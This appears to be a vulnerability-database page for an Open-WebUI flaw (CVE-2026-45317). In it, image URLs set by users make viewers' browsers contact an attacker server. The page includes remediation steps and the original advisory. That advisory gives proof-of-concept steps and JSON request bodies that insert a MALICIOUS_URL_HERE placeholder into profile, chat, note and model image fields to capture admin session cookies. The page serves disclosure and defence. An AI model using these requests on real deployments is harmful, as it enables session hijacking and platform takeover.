CVE-2026-45317: Open-WebUI: CSRF image URL leaks session cookies
GHSA-j6w6-986j-2m2m MEDIUM PoC AVAILABLE CISA: TRACK*Open-WebUI versions 0.9.2 and earlier contain an application-wide vulnerability where any authenticated user can set a malicious external URL as an image — in profile pictures, model icons, shared chats, or shared notes — causing every user who views that content to silently send a browser GET request to an attacker-controlled server, exposing session cookies, IP addresses, and browser fingerprints without any deliberate victim action. The blast radius is broad: 12 identified rendering locations are vulnerable, and a low-privileged attacker can specifically target administrators by planting a malicious profile image URL that fires when any admin visits /admin/users/overview, enabling full platform takeover via session hijacking. With 91 prior CVEs on this package and exploitation requiring only a standard user account, the CVSS 4.6 medium score underestimates the real risk in multi-user enterprise deployments where Open-WebUI serves as the shared interface to internal LLM infrastructure. Upgrade to open-webui v0.9.3 immediately; if patching is delayed, restrict the instance to trusted users, disable public chat and note sharing, and implement egress filtering to block unexpected external GET requests from the Open-WebUI host.
What is the risk?
Despite a medium CVSS score of 4.6, real-world risk is elevated in multi-user Open-WebUI deployments. The attack requires only a valid user account (low privilege) and user interaction is passive — images render automatically without victims doing anything beyond visiting a page. The admin panel attack vector is especially dangerous: any user who plants a malicious profile image URL will capture admin session cookies the next time an administrator views the user list. Twelve identified attack surfaces across the application make partial mitigation unreliable without the full patch. The package's history of 91 prior CVEs signals persistent security debt in the codebase.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Open WebUI | pip | <= 0.9.2 | 0.9.3 |
Do you use Open WebUI? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
Patch: Upgrade open-webui to v0.9.3 or later — the fix is documented in GHSA-j6w6-986j-2m2m.
-
Workaround (if unable to patch): Disable public chat and note sharing; restrict Open-WebUI access to trusted internal users only; implement a Content Security Policy that allowlists only internal image sources.
-
Network control: Configure egress filtering on the Open-WebUI host to block HTTP/HTTPS GET requests from the application to unexpected external domains.
-
Detection: Audit proxy and WAF logs for external GET requests originating from your Open-WebUI instance to non-whitelisted domains; query the database for non-local URLs in profile_image_url fields and model profile_image_url fields; alert on image URL modifications via the user or model APIs.
-
Post-patch audit: Scan existing user profiles, model configurations, shared chats, and notes for malicious image URLs already planted before patching.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-45317?
Open-WebUI versions 0.9.2 and earlier contain an application-wide vulnerability where any authenticated user can set a malicious external URL as an image — in profile pictures, model icons, shared chats, or shared notes — causing every user who views that content to silently send a browser GET request to an attacker-controlled server, exposing session cookies, IP addresses, and browser fingerprints without any deliberate victim action. The blast radius is broad: 12 identified rendering locations are vulnerable, and a low-privileged attacker can specifically target administrators by planting a malicious profile image URL that fires when any admin visits /admin/users/overview, enabling full platform takeover via session hijacking. With 91 prior CVEs on this package and exploitation requiring only a standard user account, the CVSS 4.6 medium score underestimates the real risk in multi-user enterprise deployments where Open-WebUI serves as the shared interface to internal LLM infrastructure. Upgrade to open-webui v0.9.3 immediately; if patching is delayed, restrict the instance to trusted users, disable public chat and note sharing, and implement egress filtering to block unexpected external GET requests from the Open-WebUI host.
Is CVE-2026-45317 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2026-45317, increasing the risk of exploitation.
How to fix CVE-2026-45317?
1. Patch: Upgrade open-webui to v0.9.3 or later — the fix is documented in GHSA-j6w6-986j-2m2m. 2. Workaround (if unable to patch): Disable public chat and note sharing; restrict Open-WebUI access to trusted internal users only; implement a Content Security Policy that allowlists only internal image sources. 3. Network control: Configure egress filtering on the Open-WebUI host to block HTTP/HTTPS GET requests from the application to unexpected external domains. 4. Detection: Audit proxy and WAF logs for external GET requests originating from your Open-WebUI instance to non-whitelisted domains; query the database for non-local URLs in profile_image_url fields and model profile_image_url fields; alert on image URL modifications via the user or model APIs. 5. Post-patch audit: Scan existing user profiles, model configurations, shared chats, and notes for malicious image URLs already planted before patching.
What systems are affected by CVE-2026-45317?
This vulnerability affects the following AI/ML architecture patterns: AI model serving interfaces, Multi-user AI workspaces, Self-hosted LLM deployments.
What is the CVSS score for CVE-2026-45317?
CVE-2026-45317 has a CVSS v3.1 base score of 4.6 (MEDIUM). The EPSS exploitation probability is 0.17%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0025 Exfiltration via Cyber Means AML.T0048.003 User Harm AML.T0049 Exploit Public-Facing Application AML.T0087 Gather Victim Identity Information Compliance Controls Affected
What are the technical details?
Original Advisory
## Summary An application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This can be exploited in various locations, including: • Profile picture • Model picture • Hidden images in shared chats • Images within shared notes ## Details ### Vulnerable Code: This appears to occur in most locations where images can be uploaded/rendered. Here are found sinks: **Profile Image in chat** • Note: rendering profile picture in chat • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16Code **Profile Picture edit** • Note: Profile picture rendering in edit • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205 **Profile Image Navbar** • Note: Profile picture rendering in navbar • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237 **Profile Image UserList** • Note: rendering images in user list admin panel • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399 **Images in chat** • Note: rendering images in chat • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35 **Image in chat** • Note: Image sent in chat • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192 **Model image in chat** • Note: Model image rendering in chat • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128 **Model image in chat response** • Note: Model image rendering in the assistant response • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612 **Model Image Admin settings** • Note: Model image rendering in the admin settings • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336 **Model Image Workspace** • Note: Model image rendering in the workspace • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336 **Model Image Edit** • Note: Model image rendering in the edit modal • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407 **Image in Notes** • Note: Image rendering in shared note • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140 • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184 **Root Cause** 1. Insecure display of image • Application is sending a GET request to the unvalidated image url 2. Lack of Input Validation • Image url is not validated for filetype ## PoCs ### PoC (profile picture) **Environment** • Open-WebUl latest version (v0.6.41) • Valid user **Step 1: Create a Malicious Link** • Set up a server to obtain victim's cookies, ip, referer, user-agent, etc **Step 2: Profile Image URL** 1. Add user 1. Change the profile image url parameter to the malicious URL (server was used for PoC) 2. Example POST request: <img width="1245" height="484" alt="image" src="https://github.com/user-attachments/assets/295f0ab0-fe41-4d50-9c38-cb8c51a3bca2" /> 4. Repeat action 1. Repeat for userSignUp, updateUserProfile, and update **Step 3: View Image on Victim Admin Account** 1. Log into an admin account 2. Visit the admin panel (/admin/users/overview) 3. Notice the GET request sent to the malicious URL **Step 4: Verify User Information Is Sent** 1. Confirm user information is sent <img width="1280" height="677" alt="image" src="https://github.com/user-attachments/assets/cb2f4039-167f-43f4-bd37-ffaf4d476cee" /> ### PoC (chat) **Environment** • Open-WebUl latest version (v0.6.41) • Valid user **Step 1: Create a Malicious Link** • Set up a server to obtain victim's cookies, ip, referer, use-agent, etc **Step 2: Start chat** 1. Start chat 1. Send a message 2. Resend POST request 1. Resend post request to this endpoint /api/v1/chats/[chat_id_here] 2. Add in a file with type set to image and the url set to the malicious link 3. Replace models/ids/malicious_url_here with what is applicable 4. {"chat":{"models":["redacted"],"history":{"messages":{"id_here":{"id":"id_here","parentId":"id_here","childrenIds":["id_here"],"role":"user","content":"","files":[{"type":"image","url":"MALICIOUS_URL_HERE"}],"timestamp":1765978991,"models":["redacted"]}}},"params":{},"files":[]}} <img width="646" height="593" alt="image" src="https://github.com/user-attachments/assets/1273fe2b-3b3b-45dc-9c52-6811f7b18667" /> 3. Share chat 1. Copy link to share the chat **Step 3: View Image on Victim Account** 1. Log into a valid account 2. Open the shared chat 3. Notice the GET request sent to the malicious URL from the hidden image on the page <img width="1384" height="500" alt="image" src="https://github.com/user-attachments/assets/bd6e220d-e039-4916-9865-5ce9f0939951" /> **Step 4: Verify User Information Is Sent** 1. Confirm user information is sent <img width="1480" height="797" alt="image" src="https://github.com/user-attachments/assets/78374c2e-d9c6-476b-944d-1c8230398989" /> ### PoC (notes) **Environment** • Open WebUI latest version (v0.6.41) • Valid user with access to notes **Step 1: Create a Malicious Link** • Set up a server to obtain victim's cookies, ip, referer, use-agent, etc **Step 2: Create Note** 1. Resend POST request to /api/v1/notes/[note_id_here]/update 2. Add in the malicious URL to a file 3. Example parameters 1. (replace the ID_HERE with valid ID and MALICIOUS_URL_HERE with the malicious URL): 2. `{"title":"2025-12-17","data":{"files":[{"id":"ID_HERE","type":"image","url":"MALICIOUS_URL_HERE"}]},"access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}}}` <img width="892" height="662" alt="image" src="https://github.com/user-attachments/assets/325a9bfa-2fb3-45be-aeec-e5695085d7d0" /> 4. Refresh page and notice the request being sent to the malicious URL 5. Share note and copy link **Step 5: View Note on Valid Account** 1. Log into a valid account 2. Open the shared note 3. Notice the GET request sent to the malicious URL from the hidden image on the page <img width="1597" height="317" alt="image" src="https://github.com/user-attachments/assets/767d865b-04a0-42b9-82fc-122acb9cbf16" /> **Step 6: Verify User Information Is Sent** 1. Verify that user information is sent. <img width="1997" height="860" alt="image" src="https://github.com/user-attachments/assets/b0ecab88-9830-4fb4-ac18-acda9eb44ff7" /> ### PoC (model) **Environment** • Open WebUI latest version (v0.6.41) • Admin user **Step 1: Create a Malicious Link** • Set up a server to obtain victim's cookies, ip, referer, use-agent, etc **Step 2: Create Model** 1. Navigate to /workspace/models 2. Create or edit a model 3. Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id] 1. Change the profile_image_url to the malicious link 2. Example parameters: 3. `{"id":"model_test","base_model_id":"redacted","name":"MODEL_TEST","meta":{"profile_image_url":"MALICIOUS_URL_HERE","description":null,"suggestion_prompts":null,"tags":[],"capabilities":{"vision":true,"file_upload":true,"web_search":true,"image_generation":true,"code_interpreter":true,"citations":true,"usage":false}},"params":{},"access_control":null}` <img width="887" height="618" alt="image" src="https://github.com/user-attachments/assets/749dac39-0b9d-4b7e-815d-fd6f3f7c57bd" /> **Step 3: View Image on Valid Account** 1. Log into a valid account 2. Create chat with the model 3. Notice a GET request is sent to the malicious url 4. All users starting a chat with that model will be vulnerable to the attack <img width="1852" height="468" alt="image" src="https://github.com/user-attachments/assets/ff69c0a2-326d-4b99-9d8c-a73d9aa0deff" /> **Step 4: View Image on Admin Account** 1. Navigate to /workspace/models 2. Notice GET request sent to malicious url <img width="1793" height="482" alt="image" src="https://github.com/user-attachments/assets/bda6e687-ccad-4914-a779-281dc67ffcfe" /> **Step 5: Verify User Information Is Sent** 1. On the set up server verify that improperly set cookies are sent, IP, user-agent, etc. <img width="1687" height="910" alt="image" src="https://github.com/user-attachments/assets/c783ad50-6701-4df8-8beb-ba0957baa2d9" /> ### Other Attack Examples - Alternative malicious links - Signout of Open WebUI - /api/v1/auths/signout - Internal network endpoints - Signout of other applications - Resource intensive endpoints - Etc ### Recommended Fix - Store images - Instead of sending a GET request to load the image each time, store the image and render on the page - Validate input - Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc) ## Impact ### Vulnerability Type - CWE-352: Cross-Site Request Forgery (CSRF) - CWE-20: Improper Input Validation ### Affected users - All authenticated users The impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.
Exploitation Scenario
An attacker with a basic Open-WebUI account stands up a simple HTTP logging server and updates their profile_image_url to point at it via the user profile API. When an administrator next visits /admin/users/overview to review accounts, the admin's browser automatically fetches the attacker's URL to render the profile image, including the admin's session cookie in the request headers. The attacker captures the session token and replays it to authenticate as the administrator, gaining full control over all model configurations, API keys, user accounts, and the entire conversation history stored in the platform — which may contain sensitive business data, internal IP, or credentials passed to the LLM. For maximum reach, the attacker alternatively sets the malicious URL as a popular shared model's profile image, passively harvesting cookies from every user who starts a chat with that model.
Weaknesses (CWE)
CWE-20 — Improper Input Validation: The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
- [Architecture and Design] Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build "recognizers" for that language. This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111]
- [Architecture and Design] Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173).
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L References
Timeline
Related Vulnerabilities
CVE-2026-44551 9.1 open-webui: LDAP auth bypass — full account takeover
Same package: open-webui CVE-2026-45672 8.8 open-webui: code exec gate bypass via API endpoint
Same package: open-webui CVE-2026-44552 8.7 open-webui: Redis cache poisoning enables cross-instance tool hijack
Same package: open-webui CVE-2025-64495 8.7 Open WebUI: XSS-to-RCE via malicious prompt injection
Same package: open-webui CVE-2026-45315 8.7 open-webui: stored XSS → JWT theft and admin takeover
Same package: open-webui